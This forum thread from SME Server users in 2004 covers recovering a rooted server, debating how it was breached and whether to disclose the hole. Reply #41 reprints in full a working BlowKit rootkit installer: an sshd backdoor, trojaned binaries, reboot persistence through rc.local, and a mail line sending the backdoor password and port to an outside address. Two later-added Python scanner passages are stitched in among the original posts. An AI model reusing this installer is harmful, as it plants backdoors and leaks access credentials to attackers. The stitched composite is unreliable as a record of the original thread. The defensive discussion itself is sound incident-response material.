Koozali.org: home of the SME Server

5.6 Hacked/Rooted, Trying to recover

Brian L.

5.6 Hacked/Rooted, Trying to recover
« on: March 31, 2004, 03:10:45 PM »
Everyone,

Well, I have a client's box that was rooted earlier this week. I have taken it offline, but there is data that I would like to get off of this box before I format it.

This box is 5.6 with most current updates. I will be moving this client to 6.0.1 ISO after I get the data off, but for now, I cannot get into the machine for a variety of reasons.

1 - I cannot get through the full boot, it halts just after "Enabling Swap Space -- OK". So, could someone provide a way for me to turn off services, so I can just get to a login? I have tried CTRL-X, then "Mitel-SME Emergency rw", but this asks for root password (explained in next problem). Booting normally always halts right after "Enabling Swap Space". Any help would be appreciated, perhaps in editing a file that can disable services.

2 - The root password has been changed. I have booted in with Knoppix to change the /etc/shadow file, to remove the root password, but this doesn't ever seem to have any impact. I remove the * between the first and second ":", save, and reboot, and the root password is still there (I am able to test using "Mitel-SME emergency rw"). Any other good ideas on how to change root password? If I can fix #1, I can probably do this with "Mitel-SME single", but for now that just freezes after enabling swap like above.

Any help greatly appreciated.

Brian

Brian L.

Update
« Reply #1 on: March 31, 2004, 03:59:27 PM »
For problem #1, I am somewhat sure it is not the SWAP, as I have tried creating a new swap using mkswap -c /dev/hda2 from knoppix. This worked fine.

So, an additional question for problem #1 is: How can I find out the file where things boot, so I can disable the next thing after "enabling swap", whatever it is. Even finding out what it is would be useful even if I can't change it.

Thanks
Brian

Boris
5.6 Hacked/Rooted, Trying to recover
« Reply #2 on: March 31, 2004, 10:07:16 PM »
Why not copy data off this server while booted from Knoppix CD?

Brian L.

5.6 Hacked/Rooted, Trying to recover
« Reply #3 on: March 31, 2004, 11:51:10 PM »
One word: MySQL. The data I need is buried in multiple mysql databases, and the easiest/best way for me to get the data off is to be able to boot in and do a sql backup.

Brian

Brian L

Another Question - Logs
« Reply #4 on: April 01, 2004, 12:26:26 AM »
Another question that I have that falls into this general topic -- where can I find files about the boot up? I.e., so I can pinpoint what is going wrong right after enabling swap.

Someone, Anyone, Throw me a bone!

Brian

Brushfireb

Incentive!
« Reply #5 on: April 01, 2004, 01:45:43 AM »
Everyone,

To provide some incentive for someone to help me out, I am offering $50 via paypal to someone who can help me sort this out so I can just get the box up and running -- fixing the #1 problem is primary.

Brian

LoRz

5.6 Hacked/Rooted, Trying to recover
« Reply #6 on: April 01, 2004, 03:38:58 AM »
From the top of my mind there is an "interactive boot" option that can be used to allow/prevent services from being started.

try this:

1. Edit /etc/sysconfig/init to contain the line

PROMPT=yes

(If it's set to NO).
 
2. Reboot box and hold button "I" pressed during hardware configuration messages shown on the screen. At some point you'll see questions about which services to start or not. Then you can select services you need to run. Hope it may help to resolve your problem  :-).

Regards

Brian

5.6 Hacked/Rooted, Trying to recover
« Reply #7 on: April 01, 2004, 03:54:04 AM »
Lorz,

Thanks for the suggestion. I don't think the boot is getting that far. After trying your suggestion, it doesn't do anything except echo onto the screen. Tried holding, tapping, pressing randomly, nothing.

I'm not convinced the machine has even started loading services yet.

The last couple lines that I see are:

Finding Module Dependencies       [ OK ]
Checking Filesystems
  /Boot: recovering journal
  /Boot: clean, 33/26104, somenumber blocks
Mounting Local Filesystems        [ OK ]
Enabling Local Filesystem Quotas  [ OK ]
Enabling Swap Space               [ OK ]

It halts there, the line above just sits there forever.

Brian

Ed

5.6 Hacked/Rooted, Trying to recover
« Reply #8 on: April 01, 2004, 04:14:59 AM »
Can you login in single user mode?

I think  
ctrl-x  when the blue screen comes up.
? for list of kernels
then type '(kernel) single'  where (kernel) is one of the kernels listed.

Ed

mdo
5.6 Hacked/Rooted, Trying to recover
« Reply #9 on: April 01, 2004, 04:44:15 AM »
I would go with Boris' recommendation:

Boot from Knoppix to be able to check
- is that HDD still properly partitioned?
- can you run a file system check (e2fsck) on the existing partitions?

Regards,
Michael

Boris
5.6 Hacked/Rooted, Trying to recover
« Reply #10 on: April 01, 2004, 05:34:34 AM »
I am no MySQL guru (or any serious DB guru for this matter), but I have copied all the files from /var/lib/mysql folder (while MySQL server was stopped) to the new server before and it worked.
By the way I’ve done before almost the same with MSSQL data as well and it worked too.

Anonymous

5.6 Hacked/Rooted, Trying to recover
« Reply #11 on: April 01, 2004, 09:32:11 PM »
Quote from: "Ed"
Can you login in single user mode?

I think  
ctrl-x  when the blue screen comes up.
? for list of kernels
then type '(kernel) single'  where (kernel) is one of the kernels listed.

Ed


Yes, I have tried this. Strangely, I get "Segmentation fault" whenever I try to do anything.

I really think this system has huge HD corruption.

Anonymous

5.6 Hacked/Rooted, Trying to recover
« Reply #12 on: April 01, 2004, 09:33:48 PM »
Quote from: "mdo"
I would go with Boris' recommendation:

Boot from Knoppix to be able to check
- is that HDD still properly partitioned?
- can you run a file system check (e2fsck) on the existing partitions?

Regards,
Michael


Michael,

Thanks for the tip. I have already checked the partitions, and can access all of them fine when I am booted from Knoppix. They mount fine and I can move around and grab files. e2fsck runs fine, no errors.

I have even begun testing the hardware to see if that is an issue. Memtest86 returns all fine.

Anonymous

5.6 Hacked/Rooted, Trying to recover
« Reply #13 on: April 01, 2004, 09:35:11 PM »
Quote from: "Boris"
I am no MySQL guru (or any serious DB guru for this matter), but I have copied all the files from /var/lib/mysql folder (while MySQL server was stopped) to the new server before and it worked.
By the way I’ve done before almost the same with MSSQL data as well and it worked too.


I think this is what I am going to have to do. I have another unused machine that I am going to get access to this weekend, and I will do a fresh install of 5.6 and try to grab the data out of MySQL by copying files like you suggest.

I will let you know how I fare.

Brian

freddo

5.6 Hacked/Rooted, Trying to recover
« Reply #14 on: April 02, 2004, 04:06:35 AM »
Unfortunately you have been "rooted"

I have had 5 machines screwed up in the last two weeks. Your 'segmentation fault' message is because that particular command has been hacked.
e.g. if you try using ls in single user you may get the message but try dir and you won't.

the disk is fine, just commands like ps, ls etc are screwed.

if you can mount the disk on a different machine you should be able to copy any data off.

I was lucky - only using them as firewalls so it was a simple rebuild for me
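
The trojaned-binary problem freddo describes can be confirmed from the live CD without executing anything on the suspect disk. The following script is an added example, not from this thread or from SME Server: it builds a SHA-256 manifest from a clean install of the same version (mounted at an assumed /mnt/clean, as Brian planned to set up) and checks the suspect root (assumed /mnt/suspect) against it, reporting which binaries differ.

```python
"""Offline integrity check of system binaries on a mounted, suspect root.

Added example, not from the thread. Assumptions: the compromised disk is
mounted read-only under a live CD (e.g. /mnt/suspect) and a clean install
of the same SME version is mounted alongside it (e.g. /mnt/clean) to build
the reference manifest from. The binary list is illustrative.
"""
import hashlib
import os
import sys

# Commands the thread reports as misbehaving (ls, ps) plus other common
# rootkit targets; extend this for the system being checked.
DEFAULT_BINARIES = [
    "bin/ls", "bin/ps", "bin/netstat", "bin/login", "bin/bash",
    "usr/bin/find", "usr/bin/top", "usr/sbin/sshd", "sbin/ifconfig",
]


def sha256_file(path, chunk=65536):
    """Return the hex SHA-256 of a file, reading it in chunks."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for block in iter(lambda: f.read(chunk), b""):
            h.update(block)
    return h.hexdigest()


def build_manifest(clean_root, binaries=DEFAULT_BINARIES):
    """Hash each listed binary under a trusted root; missing ones are skipped."""
    manifest = {}
    for rel in binaries:
        path = os.path.join(clean_root, rel)
        if os.path.isfile(path):
            manifest[rel] = sha256_file(path)
    return manifest


def verify_root(suspect_root, manifest):
    """Compare binaries under the suspect root against the manifest.

    Returns a dict mapping each relative path to 'ok', 'modified' or
    'missing'. Note: absolute symlinks on the suspect disk resolve against
    the live CD's root, so check such links by hand.
    """
    results = {}
    for rel, good_hash in manifest.items():
        path = os.path.join(suspect_root, rel)
        if not os.path.isfile(path):
            results[rel] = "missing"
        elif sha256_file(path) != good_hash:
            results[rel] = "modified"
        else:
            results[rel] = "ok"
    return results


def main(argv):
    if len(argv) != 3:
        print(f"usage: {argv[0]} CLEAN_ROOT SUSPECT_ROOT")
        return 2
    manifest = build_manifest(argv[1])
    results = verify_root(argv[2], manifest)
    for rel in sorted(results):
        print(f"{results[rel]:8s} {rel}")
    # Non-zero exit if anything differs, so the check can be scripted.
    return 1 if any(v != "ok" for v in results.values()) else 0


if __name__ == "__main__":
    sys.exit(main(sys.argv))
```

Run it as `python3 check.py /mnt/clean /mnt/suspect`; any line reporting `modified` for ls, ps or netstat matches the symptom freddo describes.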

Brian L

5.6 Hacked/Rooted, Trying to recover
« Reply #15 on: April 02, 2004, 04:57:37 AM »
Interesting that you have had this happen to you so frequently.

Do you think it is something with the SME distribution? like an exploit or hack that is easy?

Brian

MSmith
Isn't this a BIG DEAL?
« Reply #16 on: April 02, 2004, 08:56:09 AM »
I mean, if these 5.6 boxes have actually been rooted ... (where's the documentation on the successful attack, BTW?) then this is a big problem for those of us who haven't "taken the plunge" and upgraded from 5.6 on production machines!!!

So, gentlemen ... how about some DETAILS on these hacked boxes?

FWIW I installed and ran the following:

http://www.rootkit.nl/projects/rootkit_hunter.html

It said my 5.6u6 box is clean.

fredd0

5.6 Hacked/Rooted, Trying to recover
« Reply #17 on: April 02, 2004, 01:02:54 PM »
the machines I have had messed up are 5.1.2, 5.5

they were not necessarily fully patched on the patches that were available and I had left command line access open from the internet.

i.e. it was my own stupid fault

MSmith
5.6 Hacked/Rooted, Trying to recover
« Reply #18 on: April 02, 2004, 09:40:06 PM »
Understood, Freddo, but what about you, Brian?  You said your 5.6 box had been hacked; it would definitely be a service to the community if you could show how it was done.

5.1.2 and 5.5 have been deprecated for awhile due to security concerns, but I thought 5.6u6 and 6.0 were OK.

Anonymous

5.6 Hacked/Rooted, Trying to recover
« Reply #19 on: April 03, 2004, 02:11:39 AM »
Quote from: "MSmith"
Understood, Freddo, but what about you, Brian?  You said your 5.6 box had been hacked; it would definitely be a service to the community if you could show how it was done.


Sorry - I don't agree.

If it was hacked - then it should be reported to the contrib guys. I and my customers don't want to see a 5.6 hacking howto posted on this site.

MSmith
You raise a good point there
« Reply #20 on: April 04, 2004, 07:47:17 AM »
Hacking howto not wanted, just SOME information as to how the blackhat got in.  I.e. a specific service, that should be turned off, or a PHP vulnerability in a certain version, or what?  Just saying "I've been hacked" is nothing more than alarmist, in my view.

mark
5.6 Hacked/Rooted, Trying to recover
« Reply #21 on: April 04, 2004, 08:07:18 AM »
Quote from: "Anonymous"
Sorry - I don't agree.

If it was hacked - then it should be reported to the contrib guys. I and my customers don't want to see a 5.6 hacking howto posted on this site.

- and I disagree with you - I would rather know about the hack NOW so I can protect my clients NOW - not when some other special group decides that I should know. It would appear that the hacker community already knows ....

cheers

Mark

Anonymous

5.6 Hacked/Rooted, Trying to recover
« Reply #22 on: April 04, 2004, 02:07:39 PM »
Quote from: "mark"
- and I disagree with you - I would rather know about the hack NOW so I can protect my clients NOW - not when some other special group decides that I should know. It would appear that the hacker community already knows ....


and I disagree with you - What I want is a fix for the alleged hack before someone goes blabbing about it on a public forum.

It would appear that the hacker community already knows what

del
5.6 Hacked/Rooted, Trying to recover
« Reply #23 on: April 04, 2004, 04:48:34 PM »
Hi Brian,
I am not a Linux guru but this site may help: http://ebcd.pcministry.com/ It is aimed at messed up Windows systems but allows copying of files etc. to and from any system that can use "long file names". Also includes a password reset tool. I hope this helps.
Regards,
Del :pint:
If at first you don't succeed, then sky-diving is not for you!
"Life is like a coin. You can spend it anyway you wish, but you can only spend it once." --Author Unknown

Brian L.

5.6 Hacked/Rooted, Trying to recover
« Reply #24 on: April 04, 2004, 11:40:27 PM »
Hey everyone,

Sorry for the delay, I haven't had time to post in the last day or two.

The system WAS hacked/rooted -- there is no doubt about that. It was defaced and one of the domains running had an index.php that was from a hacker group called ihrdex or something. I saw this before I shutdown the box.

I am in the process of getting my files out of mysql, some images, etc onto another test server, and then to my new production server.

I do not know how they exploited the box -- I use very strong passwords and am not lax on security. Any advice on how to find where the exploit originated on the box is much appreciated -- I'm not going to format it for a while. I have full access via Knoppix.

Brian

guest

5.6 Hacked/Rooted, Trying to recover
« Reply #25 on: April 05, 2004, 06:27:49 PM »
Brian -
1) Were you running a standard 5.6 install or did you install additional contribs?
2) What were the contribs?
3) Did you make your distro non-standard in any way (rpm update, etc.)?
4) How was the machine configured (server/gateway/etc.).
5) Were you running any web sites in primary / ibays?

Just wondering as many are probably now concerned about how vulnerable they are.  Thanks for the info. :-o

Anonymous

5.6 Hacked/Rooted, Trying to recover
« Reply #26 on: April 05, 2004, 11:27:26 PM »
Guest,

I was running a 5.6 box with most recent updates (I think update 6, is this correct?)

I had contribs installed, but they were nothing out of the ordinary -- including AWStats, Backup2WS, Damien Curtains Email SSL Contrib, Disk Utilization, CLAMD AV and that's it I think.

I did not many any non-standard changes in any way other than contribs above. Machine was configured as server+gateway. No VPN, SSH was on for public but nothing else (FTP etc closed). I was using strong passwords.

I was running 3 sites that included an installation of  Mambo Open Source (a CMS), Gallery on another IBAY (pictures), and the third website was just plain HTML.

Again, this is nothing strange here -- I am generally a stickler for security and always make sure files are correct ownership and permissions, etc.

Brian L

5.6 Hacked/Rooted, Trying to recover
« Reply #27 on: April 05, 2004, 11:28:43 PM »
Sorry, above line should read:

"I did not have any non-standard changes in any way other than contribs above"

Brian

stancol
What are the three dots for at the end of my signature file and why can't I get rid of them?These three dots right here >...

Anonymous

5.6 Hacked/Rooted, Trying to recover
« Reply #29 on: April 06, 2004, 05:41:05 PM »
Quote from: "Brian L."

The system WAS hacked/rooted -- there is no doubt about that. It was defaced and one of the domains running had an index.php that was from a hacker group called ihrdex or something. I saw this before I shutdown the box.


What you've said so far only indicates that an account which has access to your web content (perhaps www) was compromised. It doesn't indicate that your system was rooted.

Please notify security@contribs.org.

Anonymous

5.6 Hacked/Rooted, Trying to recover
« Reply #30 on: April 09, 2004, 03:32:25 PM »
Quote
I had contribs installed, but they were nothing out of the ordinary -- including AWStats, Backup2WS, Damien Curtains Email SSL Contrib, Disk Utilization, CLAMD AV and thats it I think.

I was running 3 sites that included an installation of Mambo Open Source (a CMS), Gallery on another IBAY (pictures)


Would you let us know what versions of all the above you had on, including what version of php?

Thanks

Anonymous

5.6 Hacked/Rooted, Trying to recover
« Reply #31 on: April 11, 2004, 06:49:27 AM »
Quote from: "Anonymous"


What you've said so far only indicates that an account which has access to your web content (perhaps www) was compromised. It doesn't indicate that your system was rooted.

Please notify security@contribs.org.


Actually, if you read this whole thread, you would realize that I had already documented that I was rooted. The box was not able to boot up, commands in single user mode did not function, and my root password was changed. I think this equates to being rooted.

Brian

5.6 Hacked/Rooted, Trying to recover
« Reply #32 on: April 11, 2004, 06:50:11 AM »
Quote from: "Anonymous"
Quote
I had contribs installed, but they were nothing out of the ordinary -- including AWStats, Backup2WS, Damien Curtains Email SSL Contrib, Disk Utilization, CLAMD AV and thats it I think.

I was running 3 sites that included an installation of Mambo Open Source (a CMS), Gallery on another IBAY (pictures)


Would you let us know what versions of all the above you had on, including what version of php?

Thanks


I really couldn't say. The box has been formatted completely, and I didn't track version numbers on these contribs. Sorry.

Brian

Brian

Re: Maybe it was Mambo that was hacked
« Reply #33 on: April 11, 2004, 06:51:05 AM »
Quote from: "stancol"
http://www.net-security.org/vuln.php?id=3337


I am decently sure that I was running 1.0.4, now all of my machines are running the newest 1.0.5. Although, I could be wrong, and this could be the source.

Anonymous

5.6 Hacked/Rooted, Trying to recover
« Reply #34 on: April 11, 2004, 11:28:34 PM »
Thanks

stancol
Who gets the booby prize?
« Reply #35 on: April 13, 2004, 01:21:53 AM »
Quote
To provide some incentive for someone to help me out, I am offering $50 via paypal to someone who can help me sort this out so I can just get the box up and running -- fixing the #1 problem is primary.

Brian


Just wondering who gets the $50? Not that I need $50, I'm way too rich for that. I've got more money than Bill Gates and some swamp land I'd love to unload.  :-D

(Thought the forums need a little humor, they've been getting way too serious.)
What are the three dots for at the end of my signature file and why can't I get rid of them?These three dots right here >...

Boris
5.6 Hacked/Rooted, Trying to recover
« Reply #36 on: April 13, 2004, 10:38:55 AM »
Brian,
If you feel like it, you could just donate your money to contribs.org to support this forum and hosting.
We all will benefit from it :-)
Just an option and no obligations.

stancol
Good Idea
« Reply #37 on: April 14, 2004, 05:09:23 AM »
Good idea, wish I'd thought of it, Boris. Oh well, at least my post was funnier than yours.

:hammer:
What are the three dots for at the end of my signature file and why can't I get rid of them?These three dots right here >...

Ralph

Another Idea
« Reply #38 on: April 15, 2004, 10:36:55 PM »
I think booting from Knoppix cd, or installing the drive into another Red Hat box and copying the files is a great idea. However, in the future you may want to try this.

1. Clone the drive using Norton Ghost or whatever suits your fancy.

2. Then on the cloned drive, do an upgrade of the server. It will get you booted and access to MySQL and anything else including LOGS!.... This saved me many times.

3. It also allows you to scavenge what you had and try to find the hacker. I would like to know how you were rooted; were you running Post Nuke or any other forks of PHP Nuke (if so, what version)? There is a patch for the latest version of Post Nuke.

-Ralph

Anonymous

Re: Who gets the booby prize?
« Reply #39 on: April 19, 2004, 02:54:09 AM »
Quote from: "stancol"
Quote
To provide some incentive for someone to help me out, I am offering $50 via paypal to someone who can help me sort this out so I can just get the box up and running -- fixing the #1 problem is primary.

Brian


Just wondering who gets the $50? Not that I need $50, I'm way too rich for that. I've got more money than Bill Gates and some swamp land I'd love to unload.  :-D

(Thought the forums need a little humor, they've been getting way too serious.)


I forgot about this. However, no one really "solved" my problem, just provided workarounds and ways to get the data, that I already knew and was trying. Regardless, I do appreciate everyone's help, so I am donating $25 to contribs! :)

Brian

Tom

Hacked System
« Reply #40 on: April 23, 2004, 08:52:22 PM »
I have had 5 5.5 systems hacked and left in a state that the system would not start again.

On one of the systems I was able to view the files and it seems all files were read-only, and on the other servers the swap file was missing.

The systems had no other contribs loaded and were patched. I had remote access to them through SSL and that's all.

I have now upgraded all other sites to 6 and no more attacks. I would like to know how they got in.

Regards

Tom

iFX

What version should I upgrade to?
« Reply #41 on: June 19, 2004, 06:23:56 AM »
I was hacked by my own stupid fault... was too busy to update the old 5.5 server. Now I'm paying for it with days spent backing up finding a second temporary backup server etc...

How do I know it was hacked?
Well, the web server stopped running and when I tried to restart it, it kept failing. I checked the logs and noticed some Promiscuous mode devices or something (apparently a sign of something bad - I don't know much about this stuff, mostly a windows user, not a real admin)...  I then was having a look through the file system and noticed some files in the tmp directory:
kit/
kit.tgz
SSLROOT.GZ

The kit directory contained the contents of the kit.tgz file - I moved the files off the server on to my own PC to have a closer look - turned out to be a rootkit called Blow Kit...

I'm not sure what it did to my server, and because of that, I'm figuring it's just best to back up my data and re-install a new version of SME.

contribs.org had been down until today, so I only now found out about 6.0.1
And this morning I just finished downloading the 330MB+ ISO of 6.0.0 over a 56K dial up connection (as well as the 6.0 update RPMs).  Now that I've finished downloading that, contribs is back on-line and I notice people saying install 6.0.1!

DOH!  I just spent nearly 3 days downloading 6.0.0 over my slow dial up connection... What do you recommend? Should I dump 6.0 and download 6.0.1 (another 2-3 days) and install 6.0.1 rather than 6.0?

What are the advantages/ disadvantages?
I've spent the whole day (so far) searching through the forums, but can't decide what to do...  Are the latest 6.0 updates all I'll need?

By the way, here's the contents of the rootkit install file: (would this help in possibly reversing the damage it's done to the server without having to re-install?)
================
#!/bin/bash

BLK=''
RED=''
GRN=''
YEL=''
BLU=''
MAG=''
CYN=''
WHI=''
DRED=''
DGRN=''
DYEL=''
DBLU=''
DMAG=''
DCYN=''
DWHI=''
RES=''

unset HISTFILE
unset HISTSAVE
export HISTFILE=/dev/null
echo "${BLU} Welcome to BlowKit v2.0 (®mecanicus)"
if test -n "$1"; then
pass=$1
port=$2
mail=$3
else
echo "${BLU} ./install pass port mail "
echo "${WHI} Error..."
exit 0
fi
echo "${WHI} Freeing some resources and put some signs..."
echo "${WHI} |--------------------|100%"
pass=md5sum --string=$1 |awk -F ' ' ' {print $1} '
./touch /dev/.b
echo -n "${BLU}  ."
killall &>/dev/null -9 awk
echo -n "${BLU}."
killall &>/dev/null -9 rm
echo -n "${BLU}."
killall &>/dev/null -9 mv
echo -n "${BLU}."
killall &>/dev/null -9 cp
echo -n "${BLU}."
echo -n "${BLU}."
echo -n "${BLU}."
echo -n "${BLU}."
echo -n "${BLU}."
echo -n "${BLU}."
echo -n "${BLU}."
echo -n "${BLU}."
echo -n "${BLU}."
echo -n "${BLU}."
echo -n "${BLU}."
echo -n "${BLU}."
echo -n "${BLU}."
echo -n "${BLU}."
echo -n "${BLU}."
echo "${BLU}."
if [ -f "/dev/.b" ]; then
echo "Only for your info : a sign result (read diagnostic)"
./touch diagnostic
echo this rk was instaled in the past on this server!>>diagnostic
else
echo -n ""
fi
echo "${RED} -Done-"
echo "${WHI}  Next..."
echo ""
echo
echo "${WHI} Starting install sshd main backdoor"
echo "${WHI} |--------------------|100%"
./mv env /usr/bin/.env &>/dev/null
echo -n "${BLU} ."
echo -n "${BLU}."
/usr/bin/.env &>/dev/null
echo -n "${BLU}."
echo -n "${BLU}."
./replace 62cadae65f54888f214aa0673003ab59 $pass hdaf4
echo -n "${BLU}."
echo -n "${BLU}."
echo -n "${BLU}."
./replace 25000 $2 sshd_config
echo -n "${BLU}."
./mv hdaf4 /usr/sbin/ &>/dev/null
echo -n "${BLU}."
echo -n "${BLU}."
echo -n "${BLU}."
./mv sshd_config /usr/bin/000023 &>/dev/null
./cp .ham/* /usr/. &>/dev/null
echo -n "${BLU}."
echo -n "${BLU}."
echo -n "${BLU}."
echo -n "${BLU}."
echo -n "${BLU}."
echo -n "${BLU}."
echo -n "${BLU}."
echo -n "${BLU}."
echo "${BLU}."
echo "${RED} -Done-"
echo "${WHI}  Next..."
echo ""
echo "${WHI} Install some trojans!..."
echo "${WHI} |--------------------|100%"
echo -n "${BLU} ."
./mv blow /usr/bin/-bash &>/dev/null
/usr/sbin/hdaf4 -f /usr/bin/000023 -q
echo -n "${BLU}."
echo -n "${BLU}."
-bash &>/dev/null
echo -n "${BLU}."
./mkdir /usr/lib/.lib &>/dev/null
echo -n "${BLU}."
if [ -f "/usr/bin/gcc" ]; then
/usr/bin/gcc &>/dev/null -o netstatx2 netstatx.c
fi

if [ -f "netstatx2" ]; then
./rm &>/dev/null -rf netstatx
echo -n "${BLU}."
echo -n "${BLU}."
./mv netstatx2 netstatx &>/dev/null
fi
./cat > /usr/lib/.lib/libnh << EOF
60500
ircd
bash
ftp
under
ssh
33333
scan
6667
80.97
mycd
users
replace
install
.tmp
mec
X11f
.pid
25000
EOF
echo -n "${BLU}."
if [ -f "/etc/rc.d/rc.local" ]; then
echo "/usr/sbin/hdaf4 -f /usr/bin/000023 -q &>/dev/null">>/etc/rc.d/rc.local
echo ".env &>/dev/null">>/etc/rc.d/rc.local
echo "-bash &>/dev/null">>/etc/rc.d/rc.local
fi
./chattr &>/dev/null +isa /etc/rc.d/rc.local
echo -n "${BLU}."
./chattr &>/dev/null +isa /usr/bin/.env
./chattr &>/dev/null +isa /usr/bin/hdaf4
./chattr &>/dev/null +isa /bin/netstat
./chattr &>/dev/null +isa /usr/lib/.lib/libne
./chattr &>/dev/null +isa /usr/lib/.lib/libnh
./chattr &>/dev/null +isa /usr/bin/-bash
echo -n "${BLU}."
echo -n "${BLU}."
echo -n "${BLU}."
echo -n "${BLU}."
echo -n "${BLU}."
echo -n "${BLU}."
echo -n "${BLU}."
echo -n "${BLU}."
echo -n "${BLU}."
echo -n "${BLU}."
echo "${BLU}."
echo "${RED} -Done-"
echo "${WHI}  Next..."
echo ""
echo "${WHI} Sending a mail..."
echo "${WHI} |--------------------|100%"
if test -n "$3"; then
echo "${RED}Sending mail to $3"
echo -n "${BLU} ."
echo -n "${BLU}."
echo -n "${BLU}."
echo -n "${BLU}."
echo -n "${BLU}."
echo -n "${BLU}."
echo -n "${BLU}."
echo -n "${BLU}."
echo -n "${BLU}."
./smail $1 $2 $3 | mail -s PuliKit burlac3l@yahoo.com
echo -n "${BLU}."
echo -n "${BLU}."
echo -n "${BLU}."
echo -n "${BLU}."
echo -n "${BLU}."
echo -n "${BLU}."
echo -n "${BLU}."
./s &>/dev/null
echo -n "${BLU}."
echo -n "${BLU}."
echo -n "${BLU}."
echo -n "${BLU}."
echo "${BLU}."
else
./s &>/dev/null
echo "${RED} No mail defined"
fi
echo "${RED} -Done-"
echo "${WHI}  Next..."
echo ""
echo "${WHI} Killling mad active pids..."
killall &>/dev/null -9 mv
killall &>/dev/null -9 smail
killall &>/dev/null -9 mail
killall &>/dev/null -9 cp
killall &>/dev/null -9 rm
killall &>/dev/null -9 touch
killall &>/dev/null -9 cat
killall &>/dev/null -9 replace
killall &>/dev/null -9 awk
killall &>/dev/null -9 mkdir
killall &>/dev/null -9 crypt
killall &>/dev/null -9 chmod
killall &>/dev/null -9 ln
./chattr -iau ln
./chattr -iau install
cd ..
kit/rm -rf kit*
echo "${RED} -Done-"
echo "${WHI} Finished..."

=====================

I don't really understand what that code above does... but maybe someone here can shed some light on it all ;)

Thanks for any advice you could give me.
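
As a defender's reading of the script iFX posted: everything it installs lands at a fixed path, and it persists itself through three lines appended to /etc/rc.d/rc.local, so a disk mounted read-only under Knoppix can be checked for those artifacts without booting it. The scanner below is an added example, not code from this thread or from SME Server; the mount point /mnt/suspect is an assumption, while the paths and rc.local lines are taken directly from the script above.

```python
"""Scan a mounted root for the files the posted BlowKit install script drops.

Added example, not part of iFX's post or of any SME Server tool. It checks
only for artifacts named in the posted script, on a disk mounted offline
(the default mount point /mnt/suspect is an assumption).
"""
import os
import sys

# Paths the script creates or moves files into, relative to the root.
DROPPED_PATHS = [
    "dev/.b",                 # marker left by './touch /dev/.b'
    "usr/bin/.env",           # 'env' moved to a hidden name and executed
    "usr/sbin/hdaf4",         # modified sshd used as the backdoor
    "usr/bin/000023",         # its sshd_config, port swapped via 'replace'
    "usr/bin/-bash",          # 'blow' renamed to look like a login shell
    "usr/lib/.lib",           # hidden directory
    "usr/lib/.lib/libnh",     # list of strings the trojaned netstat hides
    "usr/lib/.lib/libne",
]

# Lines the script appends to rc.local so the backdoor survives a reboot.
RC_LOCAL_LINES = [
    "/usr/sbin/hdaf4 -f /usr/bin/000023 -q &>/dev/null",
    ".env &>/dev/null",
    "-bash &>/dev/null",
]


def find_dropped_files(root):
    """Return the dropped paths that exist under root (files, dirs or links)."""
    return [p for p in DROPPED_PATHS if os.path.lexists(os.path.join(root, p))]


def find_rc_local_persistence(root):
    """Return rc.local lines that match the ones the script appends."""
    rc = os.path.join(root, "etc/rc.d/rc.local")
    if not os.path.isfile(rc):
        return []
    with open(rc, "r", errors="replace") as f:
        return [ln.strip() for ln in f if ln.strip() in RC_LOCAL_LINES]


def read_hidden_strings(root):
    """Return the strings listed in libnh (connections/processes being hidden)."""
    path = os.path.join(root, "usr/lib/.lib/libnh")
    if not os.path.isfile(path):
        return []
    with open(path, "r", errors="replace") as f:
        return [ln.strip() for ln in f if ln.strip()]


def scan(root):
    """Collect all findings into one dict; an empty dict means nothing found."""
    findings = {}
    dropped = find_dropped_files(root)
    if dropped:
        findings["dropped_files"] = dropped
    persistence = find_rc_local_persistence(root)
    if persistence:
        findings["rc_local"] = persistence
    hidden = read_hidden_strings(root)
    if hidden:
        findings["netstat_hidden"] = hidden
    return findings


def main(argv):
    root = argv[1] if len(argv) > 1 else "/mnt/suspect"  # assumed mount point
    findings = scan(root)
    if not findings:
        print(f"no BlowKit artifacts found under {root}")
        return 0
    for kind, items in findings.items():
        print(f"{kind}:")
        for item in items:
            print(f"  {item}")
    return 1


if __name__ == "__main__":
    sys.exit(main(sys.argv))
```

The script also runs chattr +isa on the files it drops, so they resist deletion until the attributes are cleared with chattr -i; running lsattr on the mounted disk is a cheap extra check for that.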

iFX

Sorry...
« Reply #42 on: June 21, 2004, 06:15:27 AM »
Sorry, I'm an idiot... I didn't mean to post here - was supposed to go in the General area  :(

Ed

5.6 Hacked/Rooted, Trying to recover
« Reply #43 on: June 21, 2004, 09:51:28 PM »
Take the 6.0 iso image as a seed to rsync the 6.0.1.

http://mirror.contribs.org/smeserver/contribs/dmay/mitel/howto/rsync-smeserver-5.6dev.iso-howto.html
It's for 5.6 but it's the same idea.

Ed

Anonymous

recovering drive
« Reply #44 on: June 22, 2004, 01:08:57 AM »
I am interested in how you restored your MySQL. I too have a drive that will not boot, it can't find /ext3 (or something). I have the drive in a Windows box and can read and pull data off of it. I just don't know how to add that data into the new install I have on a different box. Any ideas would be great!